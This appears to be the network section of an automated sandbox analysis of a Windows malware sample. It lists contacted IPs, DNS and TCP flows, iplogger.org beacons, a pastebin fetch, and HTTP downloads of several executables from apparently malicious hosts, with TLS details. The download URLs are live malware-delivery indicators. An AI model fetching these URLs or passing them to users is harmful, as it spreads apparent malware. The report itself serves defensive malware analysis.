Network Analysis
IP Address | Status | Action |
---|---|---|
103.124.106.203 | Active | Moloch |
104.23.99.190 | Active | Moloch |
108.167.143.77 | Active | Moloch |
141.136.39.190 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.217.25.14 | Active | Moloch |
172.67.162.110 | Active | Moloch |
179.43.158.179 | Active | Moloch |
188.93.233.223 | Active | Moloch |
45.133.1.139 | Active | Moloch |
45.144.30.78 | Active | Moloch |
5.101.110.225 | Active | Moloch |
88.99.66.31 | Active | Moloch |
91.200.41.57 | Active | Moloch |
- TCP Requests
-
-
192.168.56.102:49814 103.124.106.203:80
-
192.168.56.102:49810 104.23.99.190:443pastebin.com
-
192.168.56.102:49820 108.167.143.77:443www.investinae.com
-
192.168.56.102:49818 141.136.39.190:443msiamericas.com
-
192.168.56.102:49797 172.217.25.14:443
-
192.168.56.102:49817 172.67.162.110:80file.ekkggr3.com
-
192.168.56.102:49819 179.43.158.179:80mytoolsprivacy.site
-
192.168.56.102:49813 188.93.233.223:80
-
192.168.56.102:49806 45.133.1.139:80
-
192.168.56.102:49821 45.144.30.78:80aretywer.xyz
-
192.168.56.102:49815 5.101.110.225:443digitalassets.ams3.digitaloceanspaces.com
-
192.168.56.102:49816 5.101.110.225:443digitalassets.ams3.digitaloceanspaces.com
-
192.168.56.102:49809 88.99.66.31:443iplogger.org
-
192.168.56.102:49827 88.99.66.31:443iplogger.org
-
192.168.56.102:49811 91.200.41.57:80whatitis.site
-
- UDP Requests
-
-
192.168.56.102:50538 164.124.101.2:53
-
192.168.56.102:50839 164.124.101.2:53
-
192.168.56.102:51857 164.124.101.2:53
-
192.168.56.102:54221 164.124.101.2:53
-
192.168.56.102:54660 164.124.101.2:53
-
192.168.56.102:55957 164.124.101.2:53
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:61998 164.124.101.2:53
-
192.168.56.102:62039 164.124.101.2:53
-
192.168.56.102:62461 164.124.101.2:53
-
192.168.56.102:63574 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:50840 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
8.8.8.8:53 192.168.56.102:55957
-
8.8.8.8:53 192.168.56.102:57660
-
GET
200
https://iplogger.org/1ixtu7
REQUEST
RESPONSE
BODY
GET /1ixtu7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 08:36:45 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=pld4lnji23db6aguolnbv1f3q6; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=262645986; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://pastebin.com/raw/mH2EJxkv
REQUEST
RESPONSE
BODY
GET /raw/mH2EJxkv HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 08:36:45 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db215b5d0127a091a07007d19b93e020e1616402205; expires=Wed, 21-Apr-21 08:36:45 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 1515
cf-request-id: 08faad626b000035191cbaa000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 633e18171d1d3519-ICN
GET
200
https://iplogger.org/1hVa87
REQUEST
RESPONSE
BODY
GET /1hVa87 HTTP/1.1
Accept: text/*
User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows Phone OS 4.0; Trident/4.0; IEMobile/4.0; HTC; Titan)
Host: iplogger.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 08:37:18 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=r2t0afvcenf6mtetgaqqj3oat2; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=262645953; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 4f8c28e20130e4f741269a57e8c90ce50dc0c7ccf29e4467d4563aa01d48960f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://iplogger.org/1lx5k
REQUEST
RESPONSE
BODY
GET /1lx5k HTTP/1.1
Host: iplogger.org
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 08:37:25 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=q3s4jsk7cspahihbbc34qmjhm4; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=262645946; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
http://45.133.1.139/Manager/Temp/EFgzd7IrnKmvSY7NoweEU7Pm/KG5pc5F7jZu3r0hr7kiig97u.exe
REQUEST
RESPONSE
BODY
GET /Manager/Temp/EFgzd7IrnKmvSY7NoweEU7Pm/KG5pc5F7jZu3r0hr7kiig97u.exe HTTP/1.1
Host: 45.133.1.139
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 08:36:42 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
Last-Modified: Fri, 19 Mar 2021 20:35:10 GMT
ETag: "2400-5bde9a6fb2a0c"
Accept-Ranges: bytes
Content-Length: 9216
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET
200
http://whatitis.site/dlc/mixinte
REQUEST
RESPONSE
BODY
GET /dlc/mixinte HTTP/1.1
Host: whatitis.site
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 08:36:41 GMT
Content-Length: 318464
Connection: keep-alive
Last-Modified: Mon, 22 Mar 2021 08:34:54 GMT
ETag: "4dc00-5be1bf0a51cb0"
Accept-Ranges: bytes
GET
0
http://188.93.233.223/proxy1.exe
REQUEST
RESPONSE
BODY
GET /proxy1.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: 188.93.233.223
Connection: Keep-Alive
GET
200
http://103.124.106.203/cof4/inst.exe
REQUEST
RESPONSE
BODY
GET /cof4/inst.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: 103.124.106.203
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 22 Mar 2021 08:36:46 GMT
Content-Type: application/octet-stream
Content-Length: 5803008
Last-Modified: Sun, 21 Mar 2021 07:20:24 GMT
Connection: keep-alive
ETag: "6056f3b8-588c00"
Accept-Ranges: bytes
GET
200
http://file.ekkggr3.com/iuww/jvppp.exe
REQUEST
RESPONSE
BODY
GET /iuww/jvppp.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: file.ekkggr3.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 08:36:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db294e74562767ef2634dffb1e3bd3f371616402206; expires=Wed, 21-Apr-21 08:36:46 GMT; path=/; domain=.ekkggr3.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 08faad65ea000035ec96376000000001
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=L56A7GhXklM6BbWHzW3egcbdnm%2BPgl3a8RcTjLm2Omg%2F4FhN1%2FxvhqrM4CmBuLLG7mxmq9Z%2BPgeShZjMKrvv%2BBPALSVdYqf2pV9mvsBqESUJ"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 633e181cac0e35ec-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
http://mytoolsprivacy.site/downloads/privacytools3.exe
REQUEST
RESPONSE
BODY
GET /downloads/privacytools3.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: mytoolsprivacy.site
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 08:36:46 GMT
Content-Type: application/x-msdos-program
Content-Length: 260608
Connection: keep-alive
Keep-Alive: timeout=3
Last-Modified: Mon, 22 Mar 2021 08:36:02 GMT
ETag: "3fa00-5be1bf4afab73"
Accept-Ranges: bytes
GET
200
http://aretywer.xyz/Corepad092.exe
REQUEST
RESPONSE
BODY
GET /Corepad092.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: aretywer.xyz
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Mar 2021 08:36:47 GMT
Content-Type: application/octet-stream
Content-Length: 604672
Last-Modified: Mon, 22 Mar 2021 08:30:03 GMT
Connection: keep-alive
ETag: "6058558b-93a00"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.102 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49810 104.23.99.190:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | ce:69:3b:0c:23:1f:bf:e1:a4:87:d2:44:26:54:a5:e4:bd:26:2f:7a |
TLSv1 192.168.56.102:49809 88.99.66.31:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
TLSv1 192.168.56.102:49827 88.99.66.31:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
Snort Alerts
No Snort Alerts